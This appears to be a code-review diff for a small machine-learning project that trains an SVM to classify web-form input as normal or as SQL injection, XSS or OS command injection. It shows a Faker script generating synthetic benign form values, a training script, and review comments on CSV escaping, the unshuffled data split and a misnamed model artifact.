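Review bot: each row is built by string concatenation as `type,'value'` with no CSV escaping, so a payload containing a comma is split at the comma when `calculate_statistics.py` and `train_model.py` read the file back with `pd.read_csv`, and the wrapping single quotes become part of every sample. Write the rows with `csv.writer` (for example with `quoting=csv.QUOTE_ALL`) and read them back with matching settings. The four copy-pasted blocks can be one loop over `(label, path)` pairs using `with open(...)`, and `.replace("\n", "")` after `.strip()` has no effect.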


@ -0,0 +1,68 @@
#!/usr/bin/python
from faker import Faker
faker = Faker()
print(f'name: {faker.name()}')
print(f'address: {faker.address()}')
print(f'text: {faker.text()}')
file = open("../datasets/regular_web_form_data.txt", "w")
Faker.seed(0)
for _ in range(600):
file.write(faker.ascii_company_email() + "\n")
for _ in range(600):
file.write(faker.city() + "\n")
for _ in range(600):
file.write(faker.country() + "\n")
for _ in range(600):
file.write(faker.postcode() + "\n")
for _ in range(600):
file.write(faker.street_address() + "\n")
for _ in range(600):
file.write(faker.iban() + "\n")
for _ in range(600):
file.write(faker.company() + "\n")
for _ in range(600):
file.write(faker.credit_card_number() + "\n")
for _ in range(600):
file.write(str(faker.date_of_birth()) + "\n")
for _ in range(600):
file.write(faker.domain_name() + "\n")
for _ in range(600):
file.write(faker.job() + "\n")
for _ in range(600):
file.write(faker.sentence(nb_words=10) + "\n")
for _ in range(600):
file.write(faker.passport_number() + "\n")
for _ in range(600):
file.write(faker.name() + "\n")
for _ in range(600):
file.write(faker.phone_number() + "\n")
for _ in range(600):
file.write(faker.ssn() + "\n")
for _ in range(600):
file.write(faker.user_agent() + "\n")
file.close()
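Review bot: the `normal` class is made up only of these 17 Faker field generators, 600 values each, so benign input that legitimately contains markup, SQL-like text or shell punctuation is barely represented, if at all; consider adding such samples, or at least measuring the false-positive rate on real form traffic before relying on the predictions. The three `print(...)` calls at the top are leftover debug output, and the 17 identical loops can be one loop over a list of provider methods inside `with open(...)`.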

BIN
utils/nb.joblib Normal file

Binary file not shown.

38
utils/train_model.py Normal file

@ -0,0 +1,38 @@
import numpy as np
import pandas as pd
import joblib
import matplotlib.pyplot as plt
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB, GaussianNB
from sklearn import svm
from sklearn.model_selection import GridSearchCV
# Loading the Data - as different payloads got many special chars csv is loaded using predefined amount of cols to avoid problems with delimiter
data = pd.read_csv('../datasets/out.csv',
usecols=range(2),
lineterminator='\n',
header=None)
y_data=data[0]
x_data=data[1]
split =(int)(0.8*data.shape[0])
x_train=x_data[:split]
x_test=x_data[split:]
y_train=y_data[:split]
y_test=y_data[split:]
# Extracting Features
count_vector = CountVectorizer()
extracted_features = count_vector.fit_transform(x_train)
# Building and Training the Model
tuned_parameters = {'kernel': ['rbf','linear'], 'gamma': [1e-3, 1e-4],'C': [1, 10, 100, 1000]}
model = GridSearchCV(svm.SVC(), tuned_parameters)
model.fit(extracted_features,y_train)
print("Model Trained Successfully!")
print("Accuracy of the model is: ",model.score(count_vector.transform(x_test),y_test)*100)
joblib.dump(model, "nb.joblib")
joblib.dump(count_vector, "vec.joblib")
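Review bot: the 80/20 split is positional (`x_data[:split]` / `x_data[split:]`) with no shuffling, and `csv_generator.py` writes `out.csv` grouped by class in the order normal, os-command-injection, sql-injection, xss, so the held-out 20% comes only from the end of the file and the printed accuracy does not reflect all four classes. Use `train_test_split` with `stratify=y_data` and a fixed `random_state`. `numpy`, `matplotlib`, `MultinomialNB` and `GaussianNB` are imported but unused, and the artifact is saved as `nb.joblib` although it holds a `GridSearchCV` over `svm.SVC`, which is misleading for whoever loads it in `main.py`.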

BIN
utils/vec.joblib Normal file

Binary file not shown.

BIN
vec.joblib Normal file

Binary file not shown.